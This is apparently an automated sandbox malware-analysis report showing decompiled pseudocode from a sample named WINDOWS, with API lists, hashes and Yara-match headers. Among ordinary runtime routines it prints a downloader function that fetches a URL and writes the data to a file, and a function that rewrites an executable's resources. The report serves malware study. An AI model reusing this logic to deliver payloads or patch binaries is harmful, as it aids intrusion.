                                                    									_t135 =  *0x49eb38; // 0x0
                                                    									 *(_t135 + 0x54) = _t65;
                                                    								} else {
                                                    									_t78 =  *0x49eb38; // 0x0
                                                    									_t65 = E00403DE8( *((intOrPtr*)(_t78 + 4)), __eflags);
                                                    									_t140 =  *0x49eb38; // 0x0
                                                    									 *(_t140 + 0x54) = _t65;
                                                    								}
                                                    							} else {
                                                    								_push( *((intOrPtr*)(_t155 + 4)));
                                                    								_t80 =  *0x49eb38; // 0x0
                                                    								_t65 = E00403DE8( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                                    							}
                                                    							if( *0x49eb38 == 0) {
                                                    								goto L32;
                                                    							} else {
                                                    								_t119 =  *0x49eb38; // 0x0
                                                    								_t41 = _t119 + 0x5c; // 0x5c
                                                    								_t42 = _t119 + 0x44; // 0x44
                                                    								_t65 = E00408E50(_t42, 0x10, _t41);
                                                    								if(_t65 != 0) {
                                                    									goto L32;
                                                    								}
                                                    								if(_v28 != 0) {
                                                    									_t75 =  *0x49eb38; // 0x0
                                                    									 *((intOrPtr*)( *_t75 + 0x34))();
                                                    								}
                                                    								_t72 =  *0x49eb38; // 0x0
                                                    								 *((intOrPtr*)( *_t72 + 0x30))();
                                                    								_t74 =  *0x49eb38; // 0x0
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								return _t74;
                                                    							}
                                                    						}
                                                    					}
                                                    					_t65 = E00438DBC(1);
                                                    					if( *0x49eb38 == 0) {
                                                    						goto L32;
                                                    					}
                                                    					_t102 =  *0x49eb38; // 0x0
                                                    					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                                    					_t103 =  *0x49eb38; // 0x0
                                                    					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                                    					_t104 =  *0x49eb38; // 0x0
                                                    					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                                    					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                    					_t65 = E00438DBC(0);
                                                    					if( *0x49eb38 == 0) {
                                                    						goto L32;
                                                    					}
                                                    					goto L12;
                                                    				}
                                                    				_t110 =  *0x49eb44; // 0x0
                                                    				asm("cdq");
                                                    				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x49eb50; // 0x0
                                                    				if(_t165 >= 0) {
                                                    					goto L3;
                                                    				}
                                                    				_t114 =  *0x49eb48; // 0x0
                                                    				asm("cdq");
                                                    				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                                    				_t166 = _t65 -  *0x49eb50; // 0x0
                                                    				if(_t166 < 0) {
                                                    					goto L32;
                                                    				}
                                                    				goto L3;
                                                    			}

                                                    0x00438e92
                                                    0x00438e9b
                                                    0x00438eca
                                                    0x00438eca
                                                    0x00438ed0
                                                    0x00438ee6
                                                    0x00438eef
                                                    0x00438ef1
                                                    0x00438ef8
                                                    0x00438efa
                                                    0x00438f00
                                                    0x00438f0d
                                                    0x00438f12
                                                    0x00438f12
                                                    0x00438ef8
                                                    0x00438f17
                                                    0x00438f23
                                                    0x00438f33
                                                    0x00438f3a
                                                    0x00438f3a
                                                    0x00438f3a
                                                    0x00438f3f
                                                    0x00438f25
                                                    0x00438f25
                                                    0x00438f2c
                                                    0x00438f2c
                                                    0x00438f46
                                                    0x00438f4e
                                                    0x00438f9b
                                                    0x00438f9b
                                                    0x00438fa2
                                                    0x00438fa8
                                                    0x00438fab
                                                    0x00438fb4
                                                    0x00438fbc
                                                    0x00438fc4
                                                    0x00438fc9
                                                    0x00438fd2
                                                    0x00438fd9
                                                    0x00438fd9
                                                    0x00438fe7
                                                    0x00438fe9
                                                    0x00438feb
                                                    0x00438ff5
                                                    0x00438ffe
                                                    0x00439002
                                                    0x0043900c
                                                    0x00439011
                                                    0x00439016
                                                    0x0043901b
                                                    0x0043901f
                                                    0x0043903a
                                                    0x0043903f
                                                    0x00439044
                                                    0x00439021
                                                    0x00439025
                                                    0x0043902c
                                                    0x0043902e
                                                    0x00439033
                                                    0x00439033
                                                    0x0043904b
                                                    0x0043904b
                                                    0x00439050
                                                    0x00439058
                                                    0x00439065

                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00438F00
                                                    • GetDesktopWindow.USER32 ref: 00439025
                                                    • SetCursor.USER32(00000000), ref: 0043907A
                                                      • Part of subcall function 00443194: 739F1770.COMCTL32(00000000,?,00439055), ref: 004431B0
                                                      • Part of subcall function 00443194: ShowCursor.USER32(000000FF,00000000,?,00439055), ref: 004431CB
                                                    • SetCursor.USER32(00000000), ref: 00439065
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cursor$DesktopWindow$F1770Show
                                                    • String ID:
                                                    • API String ID: 197431414-0
                                                    • Opcode ID: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                    • Instruction ID: 7774f5f5771a5045a1e06358bb4aae0e40f1de296239ba1c3ef58bb47b11143b
                                                    • Opcode Fuzzy Hash: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                    • Instruction Fuzzy Hash: 8C919174606241DFE704DF2AD885A06B7F1BB69314F14907BE4069B3A2CB78FC85CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E004107F0(intOrPtr* __eax) {
                                                    				char _v260;
                                                    				char _v768;
                                                    				char _v772;
                                                    				intOrPtr* _v776;
                                                    				signed short* _v780;
                                                    				char _v784;
                                                    				signed int _v788;
                                                    				char _v792;
                                                    				intOrPtr* _v796;
                                                    				signed char _t43;
                                                    				intOrPtr* _t60;
                                                    				void* _t79;
                                                    				void* _t81;
                                                    				void* _t84;
                                                    				void* _t85;
                                                    				intOrPtr* _t92;
                                                    				void* _t96;
                                                    				char* _t97;
                                                    				void* _t98;
                                                    
                                                    				_v776 = __eax;
                                                    				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                                    					E00410638(0x80070057);
                                                    				}
                                                    				_t43 =  *_v776;
                                                    				if((_t43 & 0x00000fff) == 0xc) {
                                                    					if((_t43 & 0x00000040) == 0) {
                                                    						_v780 =  *((intOrPtr*)(_v776 + 8));
                                                    					} else {
                                                    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                                    					}
                                                    					_v788 =  *_v780 & 0x0000ffff;
                                                    					_t79 = _v788 - 1;
                                                    					if(_t79 >= 0) {
                                                    						_t85 = _t79 + 1;
                                                    						_t96 = 0;
                                                    						_t97 =  &_v772;
                                                    						do {
                                                    							_v796 = _t97;
                                                    							_push(_v796 + 4);
                                                    							_t22 = _t96 + 1; // 0x1
                                                    							_push(_v780);
                                                    							L0040F78C();
                                                    							E00410638(_v780);
                                                    							_push( &_v784);
                                                    							_t25 = _t96 + 1; // 0x1
                                                    							_push(_v780);
                                                    							L0040F794();
                                                    							E00410638(_v780);
                                                    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                                    							_t96 = _t96 + 1;
                                                    							_t97 = _t97 + 8;
                                                    							_t85 = _t85 - 1;
                                                    						} while (_t85 != 0);
                                                    					}
                                                    					_t81 = _v788 - 1;
                                                    					if(_t81 >= 0) {
                                                    						_t84 = _t81 + 1;
                                                    						_t60 =  &_v768;
                                                    						_t92 =  &_v260;
                                                    						do {
                                                    							 *_t92 =  *_t60;
                                                    							_t92 = _t92 + 4;
                                                    							_t60 = _t60 + 8;
                                                    							_t84 = _t84 - 1;
                                                    						} while (_t84 != 0);
                                                    						do {
                                                    							goto L12;
                                                    						} while (E00410794(_t83, _t98) != 0);
                                                    						goto L15;
                                                    					}
                                                    					L12:
                                                    					_t83 = _v788 - 1;
                                                    					if(E00410764(_v788 - 1, _t98) != 0) {
                                                    						_push( &_v792);
                                                    						_push( &_v260);
                                                    						_push(_v780);
                                                    						L0040F79C();
                                                    						E00410638(_v780);
                                                    						E004109E8(_v792);
                                                    					}
                                                    				}
                                                    				L15:
                                                    				_push(_v776);
                                                    				L0040F320();
                                                    				return E00410638(_v776);
                                                    			}

                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                    • VariantClear.OLEAUT32(?), ref: 0041095B
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                    • String ID:
                                                    • API String ID: 920484758-0
                                                    • Opcode ID: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                    • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                    • Opcode Fuzzy Hash: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                    • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 57%
                                                    			E00477370(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				char _v13;
                                                    				long _v20;
                                                    				void* _v24;
                                                    				struct HINSTANCE__* _t47;
                                                    				int _t53;
                                                    				char _t56;
                                                    				void* _t61;
                                                    				struct HINSTANCE__* _t64;
                                                    				intOrPtr _t69;
                                                    				intOrPtr _t75;
                                                    				intOrPtr* _t79;
                                                    				void* _t81;
                                                    				void* _t82;
                                                    				intOrPtr _t83;
                                                    
                                                    				_t81 = _t82;
                                                    				_t83 = _t82 + 0xffffffec;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t81);
                                                    				_push(0x477494);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t83;
                                                    				_t61 = BeginUpdateResourceA(E00404E80(_v8), 0);
                                                    				_v13 = _t61 != 0;
                                                    				if(_v13 == 0) {
                                                    					_pop(_t69);
                                                    					 *[fs:eax] = _t69;
                                                    					_push(0x47749b);
                                                    					return E004049E4( &_v12, 2);
                                                    				} else {
                                                    					 *[fs:eax] = _t83;
                                                    					_t64 =  *0x49ec78; // 0x0
                                                    					_t79 = E0041E0D0(_t64, 1, 0xa, _v12);
                                                    					_v20 =  *((intOrPtr*)( *_t79))( *[fs:eax], 0x477472, _t81);
                                                    					_v24 = E0040275C( *((intOrPtr*)( *_t79))());
                                                    					 *((intOrPtr*)( *_t79 + 0xc))();
                                                    					E00403BEC(_t79);
                                                    					_t47 =  *0x49ec78; // 0x0
                                                    					FreeLibrary(_t47);
                                                    					_t53 = UpdateResourceA(_t61, 0xa, E00404E80(_v12), 0, _v24, _v20);
                                                    					asm("sbb eax, eax");
                                                    					_v13 = _t53 + 1;
                                                    					if(EndUpdateResourceA(_t61, 0) == 0 || _v13 == 0) {
                                                    						_t56 = 0;
                                                    					} else {
                                                    						_t56 = 1;
                                                    					}
                                                    					_v13 = _t56;
                                                    					_pop(_t75);
                                                    					 *[fs:eax] = _t75;
                                                    					_push(0x477479);
                                                    					return E0040277C(_v24);
                                                    				}
                                                    			}

                                                    APIs
                                                    • BeginUpdateResourceA.KERNEL32 ref: 004773A8
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00000000,00000000,00477494), ref: 00477418
                                                    • UpdateResourceA.KERNEL32 ref: 00477433
                                                    • EndUpdateResourceA.KERNEL32 ref: 00477444
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ResourceUpdate$BeginFreeLibrary
                                                    • String ID:
                                                    • API String ID: 2368538523-0
                                                    • Opcode ID: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                    • Instruction ID: 788fa2fdaf6e603f0e993ca8ed72eb25dca608fc93a6157178922b6ccb5e32dc
                                                    • Opcode Fuzzy Hash: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                    • Instruction Fuzzy Hash: 66317270B04205AFD701EBB9DC41BAEBBB9EB49704F5084BAF504F7291DA79AD00C799
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v273;
                                                    				char _v534;
                                                    				char _v790;
                                                    				struct _MEMORY_BASIC_INFORMATION _v820;
                                                    				char _v824;
                                                    				intOrPtr _v828;
                                                    				char _v832;
                                                    				intOrPtr _v836;
                                                    				char _v840;
                                                    				intOrPtr _v844;
                                                    				char _v848;
                                                    				char* _v852;
                                                    				char _v856;
                                                    				char _v860;
                                                    				char _v1116;
                                                    				void* __edi;
                                                    				struct HINSTANCE__* _t40;
                                                    				intOrPtr _t51;
                                                    				struct HINSTANCE__* _t53;
                                                    				void* _t69;
                                                    				void* _t73;
                                                    				intOrPtr _t74;
                                                    				intOrPtr _t83;
                                                    				intOrPtr _t86;
                                                    				intOrPtr* _t87;
                                                    				void* _t93;
                                                    
                                                    				_t93 = __fp0;
                                                    				_v8 = __ecx;
                                                    				_t73 = __edx;
                                                    				_t87 = __eax;
                                                    				VirtualQuery(__edx,  &_v820, 0x1c);
                                                    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                    					_t40 =  *0x49e668; // 0x400000
                                                    					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                    					_v12 = E0040CEC4(_t73);
                                                    				} else {
                                                    					_v12 = _t73 - _v820.AllocationBase;
                                                    				}
                                                    				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
                                                    				_t74 = 0x40d050;
                                                    				_t86 = 0x40d050;
                                                    				_t83 =  *0x408034; // 0x408080
                                                    				if(E00403D78(_t87, _t83) != 0) {
                                                    					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
                                                    					_t69 = E00409F88(_t74, 0x40d050);
                                                    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                    						_t86 = 0x40d054;
                                                    					}
                                                    				}
                                                    				_t51 =  *0x49ddfc; // 0x407dac
                                                    				_t16 = _t51 + 4; // 0xffd1
                                                    				_t53 =  *0x49e668; // 0x400000
                                                    				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
                                                    				E00403B3C( *_t87,  &_v1116);
                                                    				_v860 =  &_v1116;
                                                    				_v856 = 4;
                                                    				_v852 =  &_v273;
                                                    				_v848 = 6;
                                                    				_v844 = _v12;
                                                    				_v840 = 5;
                                                    				_v836 = _t74;
                                                    				_v832 = 6;
                                                    				_v828 = _t86;
                                                    				_v824 = 6;
                                                    				E0040A624(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                                    				return E00409F88(_v8, _t86);
                                                    			}

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                    • LoadStringA.USER32 ref: 0040CFC2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                    • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                    • Opcode Fuzzy Hash: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                    • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040CECE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v273;
                                                    				char _v534;
                                                    				char _v790;
                                                    				struct _MEMORY_BASIC_INFORMATION _v820;
                                                    				char _v824;
                                                    				intOrPtr _v828;
                                                    				char _v832;
                                                    				intOrPtr _v836;
                                                    				char _v840;
                                                    				intOrPtr _v844;
                                                    				char _v848;
                                                    				char* _v852;
                                                    				char _v856;
                                                    				char _v860;
                                                    				char _v1116;
                                                    				void* __edi;
                                                    				struct HINSTANCE__* _t40;
                                                    				intOrPtr _t51;
                                                    				struct HINSTANCE__* _t53;
                                                    				void* _t69;
                                                    				void* _t74;
                                                    				intOrPtr _t75;
                                                    				intOrPtr _t85;
                                                    				intOrPtr _t89;
                                                    				intOrPtr* _t92;
                                                    				void* _t105;
                                                    
                                                    				_v8 = __ecx;
                                                    				_t74 = __edx;
                                                    				_t92 = __eax;
                                                    				VirtualQuery(__edx,  &_v820, 0x1c);
                                                    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                    					_t40 =  *0x49e668; // 0x400000
                                                    					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                    					_v12 = E0040CEC4(_t74);
                                                    				} else {
                                                    					_v12 = _t74 - _v820.AllocationBase;
                                                    				}
                                                    				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
                                                    				_t75 = 0x40d050;
                                                    				_t89 = 0x40d050;
                                                    				_t85 =  *0x408034; // 0x408080
                                                    				if(E00403D78(_t92, _t85) != 0) {
                                                    					_t75 = E00404E80( *((intOrPtr*)(_t92 + 4)));
                                                    					_t69 = E00409F88(_t75, 0x40d050);
                                                    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                    						_t89 = 0x40d054;
                                                    					}
                                                    				}
                                                    				_t51 =  *0x49ddfc; // 0x407dac
                                                    				_t16 = _t51 + 4; // 0xffd1
                                                    				_t53 =  *0x49e668; // 0x400000
                                                    				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
                                                    				E00403B3C( *_t92,  &_v1116);
                                                    				_v860 =  &_v1116;
                                                    				_v856 = 4;
                                                    				_v852 =  &_v273;
                                                    				_v848 = 6;
                                                    				_v844 = _v12;
                                                    				_v840 = 5;
                                                    				_v836 = _t75;
                                                    				_v832 = 6;
                                                    				_v828 = _t89;
                                                    				_v824 = 6;
                                                    				E0040A624(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                                    				return E00409F88(_v8, _t89);
                                                    			}

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                    • LoadStringA.USER32 ref: 0040CFC2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                    • Instruction ID: 4fe94cffe00b8ae50479b7d7830d31852d6d04f91b779ba97ffbb5203982a357
                                                    • Opcode Fuzzy Hash: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                    • Instruction Fuzzy Hash: 70415270A002589BDB21DB59CC85BDAB7FD9B18305F0441FAB548F7282D7789F88CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040E174() {
                                                    				char _v152;
                                                    				short _v410;
                                                    				signed short _t14;
                                                    				signed int _t16;
                                                    				int _t18;
                                                    				void* _t20;
                                                    				void* _t23;
                                                    				int _t24;
                                                    				int _t26;
                                                    				signed int _t30;
                                                    				signed int _t31;
                                                    				signed int _t32;
                                                    				signed int _t37;
                                                    				int* _t39;
                                                    				short* _t41;
                                                    				void* _t49;
                                                    
                                                    				 *0x49e744 = 0x409;
                                                    				 *0x49e748 = 9;
                                                    				 *0x49e74c = 1;
                                                    				_t14 = GetThreadLocale();
                                                    				if(_t14 != 0) {
                                                    					 *0x49e744 = _t14;
                                                    				}
                                                    				if(_t14 != 0) {
                                                    					 *0x49e748 = _t14 & 0x3ff;
                                                    					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
                                                    				}
                                                    				memcpy(0x49b134, 0x40e2c8, 8 << 2);
                                                    				if( *0x49b0ec != 2) {
                                                    					_t16 = GetSystemMetrics(0x4a);
                                                    					__eflags = _t16;
                                                    					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                    					_t18 = GetSystemMetrics(0x2a);
                                                    					__eflags = _t18;
                                                    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                    					 *0x49e750 = _t31;
                                                    					__eflags = _t31;
                                                    					if(__eflags != 0) {
                                                    						return E0040E0FC(__eflags, _t49);
                                                    					}
                                                    				} else {
                                                    					_t20 = E0040E15C();
                                                    					if(_t20 != 0) {
                                                    						 *0x49e751 = 0;
                                                    						 *0x49e750 = 0;
                                                    						return _t20;
                                                    					}
                                                    					E0040E0FC(__eflags, _t49);
                                                    					_t37 = 0x20;
                                                    					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
                                                    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                    					 *0x49e750 = _t32;
                                                    					__eflags = _t32;
                                                    					if(_t32 != 0) {
                                                    						 *0x49e751 = 0;
                                                    						return _t23;
                                                    					}
                                                    					_t24 = 0x80;
                                                    					_t39 =  &_v152;
                                                    					do {
                                                    						 *_t39 = _t24;
                                                    						_t24 = _t24 + 1;
                                                    						_t39 =  &(_t39[0]);
                                                    						__eflags = _t24 - 0x100;
                                                    					} while (_t24 != 0x100);
                                                    					_t26 =  *0x49e744; // 0x409
                                                    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                    					_t18 = 0x80;
                                                    					_t41 =  &_v410;
                                                    					while(1) {
                                                    						__eflags =  *_t41 - 2;
                                                    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                    						 *0x49e751 = _t37;
                                                    						__eflags = _t37;
                                                    						if(_t37 != 0) {
                                                    							goto L17;
                                                    						}
                                                    						_t41 = _t41 + 2;
                                                    						_t18 = _t18 - 1;
                                                    						__eflags = _t18;
                                                    						if(_t18 != 0) {
                                                    							continue;
                                                    						} else {
                                                    							return _t18;
                                                    						}
                                                    						L18:
                                                    					}
                                                    				}
                                                    				L17:
                                                    				return _t18;
                                                    				goto L18;
                                                    			}

                                                    APIs
                                                    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                    • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                      • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocaleStringThreadType
                                                    • String ID:
                                                    • API String ID: 1505017576-0
                                                    • Opcode ID: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                    • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
                                                    • Opcode Fuzzy Hash: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                    • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00474D50(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v9;
                                                    				void* _v16;
                                                    				void* _v20;
                                                    				char _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				void _v1060;
                                                    				char _v1392;
                                                    				char _v1856;
                                                    				DWORD* _t57;
                                                    				intOrPtr _t68;
                                                    				void* _t70;
                                                    				void* _t72;
                                                    				void* _t73;
                                                    				intOrPtr _t74;
                                                    
                                                    				_t72 = _t73;
                                                    				_t74 = _t73 + 0xfffff8c4;
                                                    				_v1856 = 0;
                                                    				_v28 = 0;
                                                    				_v32 = 0;
                                                    				_v36 = 0;
                                                    				_v8 = __edx;
                                                    				_t70 = __eax;
                                                    				_t57 =  &_v24;
                                                    				_push(_t72);
                                                    				_push(0x474f77);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t74;
                                                    				E00402B68(0,  &_v1856);
                                                    				E00409E18(_v1856,  &_v28);
                                                    				_v16 = InternetOpenA(E00404E80(_v28), 0, 0, 0, 0);
                                                    				_push(_t72);
                                                    				_push(0x474e92);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t74;
                                                    				_v20 = InternetOpenUrlA(_v16, E00404E80(_t70), 0, 0, 0x84000000, 0);
                                                    				_push(_t72);
                                                    				_push(0x474e74);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t74;
                                                    				E00402F1C( &_v1392, _v8, 0);
                                                    				E004028C4(E004035E4());
                                                    				do {
                                                    					InternetReadFile(_v20,  &_v1060, 0x400, _t57);
                                                    					E004028C4(E0040306C(0));
                                                    				} while ( *_t57 != 0);
                                                    				E004028C4(E0040308C( &_v1392));
                                                    				_v9 = 1;
                                                    				_pop(_t68);
                                                    				 *[fs:eax] = _t68;
                                                    				_push(0x474e7b);
                                                    				return InternetCloseHandle(_v20);
                                                    			}

                                                    APIs
                                                      • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
